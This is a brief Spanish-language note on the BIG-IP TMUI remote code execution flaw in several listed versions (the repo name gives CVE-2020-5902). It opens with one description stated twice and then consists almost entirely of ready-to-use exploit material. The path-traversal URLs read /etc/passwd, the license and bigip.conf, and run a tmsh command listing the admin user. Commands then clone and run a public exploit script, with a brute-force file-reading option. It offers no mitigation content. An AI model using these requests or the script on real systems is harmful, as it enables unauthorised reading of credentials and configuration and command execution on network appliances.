
En las versiones 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 y 11.6.1-11.6.5.1 de BIG-IP, la interfaz de usuario de gestión de tráfico (TMUI), también conocida como utilidad de configuración, presenta una vulnerabilidad de ejecución remota de código (RCE) en páginas no divulgadas.
En las versiones de BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 y 11.6.1-11.6.5.1, la interfaz de usuario de gestión de tráfico (TMUI), también denominada utilidad de configuración, tiene una vulnerabilidad de ejecución remota de código (RCE) en páginas no reveladas.
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
git clone https://github.com/yasserjanah/CVE-2020-5902
cd CVE-2020-5902/
pip3 install -r requirements.txt
python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd
-b to brute force files from a wordlist
python3 exploit-CVE-2020-5902.py -ip <IP> -b